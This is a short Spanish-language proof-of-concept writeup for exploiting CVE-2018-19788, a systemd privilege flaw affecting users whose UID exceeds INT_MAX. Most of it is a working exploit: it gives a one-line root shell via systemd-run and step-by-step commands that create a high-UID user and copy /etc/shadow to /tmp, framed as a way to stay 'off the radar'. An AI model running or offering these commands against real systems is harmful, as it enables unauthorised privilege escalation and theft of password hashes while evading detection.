
Aprovechando CVE-2018-19788 sin shells de root
CVE-2018-19788 es un problema donde cualquier usuario con un UID superior a INT_MAX (es decir, 4000000000) puede ejecutar cualquier comando systemctl en un sistema Linux con systemd, como Ubuntu. (Ya existe un writeup para obtener una shell de root: aquí). La principal diferencia entre este writeup y el writeup de shell de root completo es que esto se ejecutará como el propio usuario en lugar de un usuario root (básicamente solo un PoC, para ser honesto).
Para obtener una shell de root es tan simple como ejecutar systemd-run -t /bin/bash, pero si quieres mantenerte fuera del radar, puedes ejecutar comandos simples para obtener archivos privilegiados sin una terminal. Sigue estos pasos para hacerlo:
adduser --uid 4000000000 someusername
su someusername
systemd-run bash -c 'cat /etc/shadow > /tmp/results_poc.txt'
/tmp:
cat /tmp/results_poc.txt